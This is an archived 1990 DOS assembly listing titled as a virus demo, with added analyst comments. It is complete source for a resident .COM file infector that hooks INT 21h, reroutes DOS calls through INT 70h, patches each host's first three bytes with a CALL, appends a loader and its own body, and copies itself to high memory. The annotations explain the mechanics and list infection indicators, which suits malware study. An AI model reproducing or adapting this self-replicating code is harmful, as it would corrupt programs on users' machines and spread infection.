Assembly Source File  |  1990-02-21  |  7KB  |  432 lines

  1.  
  2. ;*****************************************************************************
  3. ;                        VIRUS  DEMO (the one that McAfee found)
  4. ;-----------------------------------------------------------------------------
  5.  
  6. len    equ    01dch    ; 1DCh = 476: byte count used both for the body write to the host file and for the rep movsb copy in the loader stub
  7.  
  8.  
  9.  
  10. ;-----------------------------------------------------------------------------
  11. ;                    FIND FIRST FILE
  12. ;-----------------------------------------------------------------------------
  ; First instructions of the resident part. Presumably this is the INT 21h entry point:
  ; the loader stub later in this file sets the INT 21h vector to 9800:0100 — no ORG is visible here, confirm.
  13. jmp    con    ; unconditional, so every intercepted call goes straight to con
  14. cmp    ah,3dh    ; unreachable after the jmp above: looks like a leftover filter on fn 3Dh (open)...
  15. je    con
  16. cmp    ah,0fh    ; ...and fn 0Fh (FCB open)
  17. je     con
  18. int    70h    ; (dead code) would have forwarded any other request to the saved DOS handler
  19. iret
  20.  
  ; con: save the caller's registers, point the DTA at buff and search for the first "*.COM" file.
  ; INT 70h is used as the DOS entry throughout; the loader stub later in this file copies the
  ; INT 21h vector into the INT 70h slot before hooking INT 21h.
  21. con:    push    ax    ; caller's AX, DS, DX are restored just before the request is forwarded
  22. push    ds
  23. push    dx
  24.  
  25.  
  26. mov    ah,1ah    ; DOS fn 1Ah: set disk transfer area to DS:DX
  27. mov    dx,cs
  28. mov    ds,dx
  29. mov    dx,offset buff    ; DTA = cs:buff (43 bytes reserved in the data area)
  30. int    70h
  31.  
  32. mov    ah,4eh    ; DOS fn 4Eh: find first matching file
  33. mov    cx,0    ; attribute mask 0
  34. mov    dx,cs
  35. mov    ds,dx
  36. mov    dx,offset fname    ; pattern "*.COM", no path given
  37. int    70h
  38. jc    error1    ; carry set = no match or failure
  39.  
  40. ;
  41. ;push    cs
  42. ;pop    ds
  43. ;mov    dx,offset buff
  44. ;mov    ah,9
  45. ;int    70h
  46. ;
  47.  
  48.  
  49. ;-----------------------------------------------------------------------------
  50. ;            FIND FILE SIZE
  51. ;-----------------------------------------------------------------------------
  52.  
  53.  
  ; Open the file the search returned and obtain its length by seeking to end of file.
  54. mov    ah,3dh    ; DOS fn 3Dh: open existing file
  55. mov    al,2    ; access mode 2 = read/write
  56. mov    dx,cs
  57. mov    ds,dx
  58. mov    dx,offset buff
  59. add    dx,30    ; DS:DX = buff+30, the file-name field of the find-first DTA
  60. int    70h
  61. jc    error1
  62. mov    fhandle,ax    ; handle reused by every later seek/read/write/close
  63.  
  64. mov    ah,42h    ; DOS fn 42h: move file pointer
  65. mov    al,2    ; origin 2 = end of file
  66. mov    bx,fhandle
  67. mov    cx,0
  68. mov    dx,0    ; CX:DX = 0, so DOS returns the file length in DX:AX
  69. int    70h
  70. jc    error1
  71.  
  72. push    ax    ; only the low word of the length is kept; it is popped later to compute sdat1
  73. ;------------------------------------
  74. ;    close
  75. ;-----------------------------------
  76. ;mov    ah,3eh
  77. ;mov    bx,fhandle
  78. ;int    70h
  79. ;jc    error1
  80.  
  81. jmp    cont    ; skip over the error1 exit; AX still holds the low word of the length
  82.  
  83. ;-----------------------------------------------------------------------------
  84. ;        NOT    FAR    ERROR
  85. ;-----------------------------------------------------------------------------
  86.  
  ; error1: failure exit for the early steps. Terminates the current process (the program whose
  ; DOS call was intercepted); the handle in fhandle is not closed on this path.
  87. error1: mov    ah,4ch    ; DOS fn 4Ch: terminate process
  88.     mov    al,1    ; exit code 1
  89.     int    70h
  90.  
  91.  
  92. ;-----------------------------------------------------------------------------
  93. ;                PUT THE CALL INSTRUCTION CODE IN BUFF
  94. ;-----------------------------------------------------------------------------
  95.  
  ; cont: build a 3-byte near CALL in buff[0..2]. AX holds the low word of the host file length.
  ; Analyst note: after a write, the host's first three bytes read E8 lo hi with hi:lo = length - 3.
  96. cont:    sub ax,3    ;find the disp for the jump code (rel16 of a 3-byte CALL at file offset 0 that targets the old end of file)
  97. mov    buff+1,al    ; displacement, low byte
  98. mov    buff+2,ah    ; displacement, high byte
  99. mov    ax,00e8h
  100. mov    buff,al    ; 0E8h = opcode of CALL rel16
  101.  
  102. ;-----------------------------------------------------------------------------
  103. ;        READ THE 3 FIRST BYTES FROM THE FILE
  104. ;-----------------------------------------------------------------------------
  105.  
  ; Read the host's original first three bytes into buff+3..buff+5 and store them in dat1..dat3.
  106. mov    ah,42h    ; DOS fn 42h: move file pointer
  107. mov    al,0    ; origin 0 = start of file
  108. mov    bx,fhandle
  109. mov    cx,0
  110. mov    dx,0
  111. int    70h
  112. jc    error1
  113.  
  114.  
  115. mov    ah,3fh    ; DOS fn 3Fh: read from handle
  116. mov    dx,cs
  117. mov    ds,dx
  118. mov    dx,offset buff
  119. add    dx,3    ; destination = buff+3, directly after the CALL built in buff[0..2]
  120. mov    bx,fhandle
  121. mov    cx,3    ; three bytes requested
  122. int    70h
  123. jc    error1
  124. cmp    ax,cx    ; AX = bytes actually read
  125. jl    error1    ; fewer than 3 bytes read -> give up
  126.  
  127.  
  128. ;-----------------------------------------------------------------------------
  129. ;            MOVE 3 BYTES FROM BUFF+3 TO dat1-3
  130. ;-----------------------------------------------------------------------------
  131.  
  132. mov    al,buff+3
  133. mov    dat1,al    ; dat1..dat3 are the single bytes following the 198,6,n,1 groups in the data area
  134. mov    al,buff+4
  135. mov    dat2,al
  136. mov    al,buff+5
  137. mov    dat3,al
  138.  
  139. ;-----------------------------------------------------------------------------
  140. ;         WRITE THE CALL INSTRUCTION (OPCODE 0E8H) TO THE START OF THE FILE
  141. ;-----------------------------------------------------------------------------
  142.  
  143.  
  ; Overwrite the first three bytes of the host file with the CALL held in buff[0..2].
  144. mov    ah,42h    ; DOS fn 42h: move file pointer
  145. mov    al,0    ; origin 0 = start of file
  146. mov    bx,fhandle
  147. mov    cx,0
  148. mov    dx,0
  149. int    70h
  150. jc    error1
  151.  
  152.  
  153. mov    ah,40h    ; DOS fn 40h: write to handle
  154. mov    dx,cs
  155. mov    ds,dx
  156. mov    dx,offset buff    ; source = E8 + 16-bit displacement
  157. mov    bx,fhandle
  158. mov    cx,3
  159. int    70h
  160. jc    error    ; from here on failures go to `error`, which does the same as error1
  161. cmp    ax,3    ; AX = bytes actually written
  162. jne    error    ; short write -> terminate; the host file is left partly modified
  163.  
  164.  
  165.  
  166. ;mov    ah,0fh
  167. ;mov    dx,cs
  168. ;mov    ds,dx
  169. ;mov    dx,offset myfcb
  170. ;int    70h
  171. ;or    al,al
  172. ;jnz    error1
  173. ;
  174. ;mov    dx,offset buff
  175. ;mov    ah,1ah
  176. ;int    70h
  177. ;
  178. ;mov    word ptr myfcb+0eh,3
  179. ;
  180. ;mov     word ptr myfcb+21h,0
  181. ;mov    word ptr myfcb+23h,0
  182. ;
  183. ;mov    ah,22h
  184. ;mov    dx,offset myfcb
  185. ;int    70h
  186. ;or    al,al
  187. ;jnz    error1
  188.  
  189. ;mov    ah,10h
  190. ;mov     dx,offset myfcb
  191. ;int    70h
  192. ;or    al,al
  193. ;jnz    error
  194.  
  195. ;-----------------------------------------------------------------------------
  196. ;    CALCULATE THE START ADDRESS OF THE VIRUS DATA ITSELF
  197. ;-----------------------------------------------------------------------------
  198.  
  ; Patch the source offset used by the loader stub's block copy.
  199. pop     ax    ; low word of the host's original length, pushed after the seek-to-end
  200. add    ax,16bh    ; presumably 100h (COM load offset) + 6Bh (prefix length written below) — TODO confirm
  201. mov    sdat1,al    ; sdat1 = the two bytes after `source db 190`, i.e. the imm16 of the encoded MOV SI
  202. mov    sdat1+1,ah
  203.  
  204.  
  205. ;-----------------------------------------------------------------------------
  206. ;            CLEAR   FCB
  207. ;-----------------------------------------------------------------------------
  208.  
  209.  
  210.  
  211. ;mov    cx,7
  212. ;mov    si,offset fname
  213. ;mov    di,offset fn
  214. ;mov    dx,cs
  215. ;mov    ds,dx
  216. ;mov    dx,cs
  217. ;mov    es,dx
  218. ;rep movsb
  219.  
  220.  
  221.  
  222. ;-----------------------------------------------------------------------------
  223. ;            WRITE THE VIRUS PREFIX TO DISK
  224. ;-----------------------------------------------------------------------------
  225.  
  226. ;mov    ah,3dh
  227. ;mov    al,2
  228. ;mov    dx,cs
  229. ;mov    ds,dx
  230. ;mov    dx,offset fn
  231. ;int    70h
  232. ;jc    error
  233. ;mov    fhandle,ax
  234.  
  ; Append two pieces to the end of the host file, then close it:
  ;   1) 6Bh bytes starting at `data` (the prefix / loader stub),
  ;   2) `len` (1DCh) bytes starting at cs:0100h.
  ; Analyst note: each pass therefore grows the file by 6Bh + 1DCh bytes; no check for an
  ; earlier pass on the same file is visible in this listing.
  235. mov    ah,42h    ; DOS fn 42h: move file pointer
  236. mov    al,2    ; origin 2 = end of file
  237. mov    bx,fhandle
  238. mov    cx,0
  239. mov    dx,0
  240. int    70h
  241. jc    error
  242.  
  243. mov    ah,40h    ; DOS fn 40h: write to handle
  244. mov    dx,cs
  245. mov    ds,dx
  246. mov    dx,offset data    ; source = prefix starting at `data`
  247. mov    bx,fhandle
  248. mov    cx,006bh    ; prefix length as hard-coded by the author
  249. int    70h
  250. jc    error
  251. cmp    ax,006bh
  252. jne    error    ; short write -> terminate
  253.  
  254.  
  255. ;----------------------------------------------------------------------------
  256. ;
  257. ;----------------------------------------------------------------------------
  258.  
  259. mov    ah,40h    ; second write continues at the current file position
  260. mov    dx,cs
  261. mov    ds,dx
  262. mov    dx,0100h    ; source = cs:0100h
  263. mov    bx,fhandle
  264. mov    cx,len
  265. int    70h
  266. jc    error
  267. cmp    ax,len
  268. jne    error
  269.  
  270.  
  271.  
  272.  
  273. ;-----------------------------------------------------------------------------
  274. ;            CLOSE FILE
  275. ;-----------------------------------------------------------------------------
  276.  
  277. mov    ah,3eh    ; DOS fn 3Eh: close handle
  278. mov    bx,fhandle
  279. int    70h
  280. jc    error
  281.  
  282.  
  283. ;-----------------------------------------------------------------------------
  284.  
  285. ;-----------------------------------------------------------------------------
  286. ;            WRITE THE VIRUS TO DISK
  287. ;-----------------------------------------------------------------------------
  288. ;jmp error
  289. ;mov    ah,15h
  290. ;mov    dx,cs
  291. ;mov    ds,dx
  292. ;mov    dx,offset myfcb
  293. ;
  294. ;mov    word ptr myfcb+0eh,len
  295. ;int    70h
  296. ;or    al,al
  297. ;jnz    error
  298. ;
  299. ;-----------------------------------------------------------------------------
  300. ;                CLOSE THE FILE
  301. ;-----------------------------------------------------------------------------
  302. ;
  303. ;mov    ah,10h
  304. ;mov    dx,cs
  305. ;mov    ds,dx
  306. ;mov    dx,offset myfcb
  307. ;int    70h
  308. ;or    al,al
  309. ;jnz    error
  310.  
  ; Restore the caller's registers and pass the original request on to the saved DOS handler.
  311. pop    dx    ; reverse order of the pushes at con
  312. pop    ds
  313. pop    ax
  314.  
  315. int    70h    ; original DOS service, with the caller's AX/DS/DX back in place
  316.  
  317. iret    ; NOTE(review): IRET reloads the FLAGS saved at interrupt entry, so the carry flag DOS returned does not appear to reach the caller — confirm
  318.  
  319.  
  320.  
  321.  
  322. ;*****************************************************************************
  323. ;                  DATA SECTION
  324. ;-----------------------------------------------------------------------------
  325.  
  ; error: failure exit for the write/close steps; same action as error1.
  326. error:    mov     ah,4ch    ; DOS fn 4Ch: terminate the current process
  327.     mov    al,1    ; exit code 1
  328.     int    70h
  329.  
  330.  
  331.  
  ; Work area of the resident part, followed by the start of the prefix that is appended to hosts.
  332. buff    db    43 dup (0)    ; used as the find-first DTA (file name read at buff+30); bytes 0..5 are reused for the CALL and the host bytes read back
  333. fname    db    "*.COM",0    ; search pattern
  334.  
  335. fhandle dw    ?    ; handle of the file currently being modified
  336.  
  337.  
  ; `data` is where the 6Bh-byte prefix write begins. 198,6,lo,hi = C6 06 lo hi, which encodes
  ; MOV BYTE PTR [hi:lo],imm8; the following dat byte is that imm8. Executed in the host, these
  ; three instructions put the host's original bytes back at 0100h..0102h.
  338. data    db    198,6,0,1    ; mov byte ptr [0100h],dat1
  339. dat1    db    0
  340. datb    db    198,6,1,1    ; mov byte ptr [0101h],dat2
  341. dat2    db    0
  342. datc    db    198,6,2,1    ; mov byte ptr [0102h],dat3
  343. dat3    db    0
  344.  
  345.  
  ; Loader stub, part of the prefix: redirect the return address to 100h, save registers, and
  ; copy `len` bytes to 9800:0100. No DOS memory-allocation call is visible before segment
  ; 9800h is written.
  346. pop    bx    ;change the call data to 100h (discard the return address left by the CALL at the host's start)
  347. mov    bx,100h
  348. push    bx    ; the final RET of the stub will go to 100h, the host's entry
  349.  
  350.  
  351. push    ax    ; saved here, popped just before the final RET
  352. push    ds
  353. push    es
  354.  
  355.  
  356.  
  357. mov     cx,len    ; copy length
  358. source    db    190    ;MOV SI,OFFSET SOURCE (190 = BEh, MOV SI,imm16; the imm16 is sdat1)
  359. sdat1    db    0,0    ; patched per host with (low word of host length) + 16Bh
  360. mov     di,100h    ; destination offset
  361. mov    dx,cs
  362. mov    ds,dx    ; source segment = current code segment
  363. mov    dx,9800h
  364. mov    es,dx    ; destination segment = 9800h
  365. rep movsb    ; DS:SI -> ES:DI, CX bytes
  366.  
  367.  
  368.  
  369. ;a    db    154,0,1,0,128    ; CALL 9800:0100
  370. ;--------------------------------------------------------------------------
  371. ;        PUT INT 21H VECT. TO INT 70H
  372. ;--------------------------------------------------------------------------
  ; Copy the INT 21h vector (0:0084h..0087h) into the INT 70h slot (0:01C0h..01C3h) so the
  ; resident code can still reach DOS through INT 70h.
  ; Analyst note: INT 70h pointing at the DOS entry is an observable artifact of this stub.
  373. push    ds    ; popped again after the INT 21h vector has been rewritten
  374. mov    ax,0
  375. mov    ds,ax    ; DS = 0: interrupt vector table
  376. push     [84h]    ; 8086 PUSH/POP move words, so consecutive pairs overlap by one byte
  377. pop     [1c0h]
  378.  
  379. push    [85h]
  380. pop    [1c1h]
  381.  
  382. push    [86h]
  383. pop    [1c2h]
  384.  
  385. push    [87h]
  386. pop    [1c3h]    ; NOTE(review): a word store here also writes 0:01C4h (first byte of the next vector) — confirm operand size with the assembler used
  387.  
  388. ;------------------------------------------------------------------------
  389. ;        HOOK THE VIRUS TO INT 21
  390. ;------------------------------------------------------------------------
  391.  
  392.  
  393. ;push    [84h]    ;IP
  394. ;push    [85h]    ;IP
  395. ;push    [86h]    ;CS
  396. ;push    [87h]    ;CS
  397.  
  398. ;mov    dx,9800h
  399. ;mov    ds,dx
  400. ; put the jump instruction at the end of virus
  401. ;mov    al,234
  402. ;mov     gen,al ;check if it`s 200h
  403. ;pop    al
  404. ;mov    gen+4,al
  405. ;pop    al
  406. ;mov    gen+3,al
  407. ;pop    al
  408. ;mov    gen+2,al
  409. ;pop    al
  410. ;mov    gen+1,al
  411.  
  412. ; hook the virus
  ; Point INT 21h at 9800:0100, issue one DOS call through the new vector, restore registers
  ; and return to the host.
  ; Analyst note: an INT 21h vector of 9800:0100 is the resident indicator for this sample.
  413. mov    dx,0
  414. mov    ds,dx    ; DS = 0: interrupt vector table
  415. mov    ax,100h
  416. mov    [84h],ax    ; INT 21h vector, offset word
  417. mov    ax,9800h
  418. mov    [86h],ax    ; INT 21h vector, segment word
  419. pop    ds    ; matches the push ds made before the vector copy
  420.  
  421. ;-----------------------------------------------------------------------
  422. ;
  423. ;-----------------------------------------------------------------------
  424. mov    ah,0fh    ; fn 0Fh (FCB open); DS:DX is not set up for it here
  425. int    21h    ; first call through the rewritten vector
  426.  
  427. pop es    ; reverse of the push ax / push ds / push es at the top of the stub
  428. pop ds
  429. pop ax
  430.  
  431. ret    ; near return to the 100h pushed at the top of the stub
  432.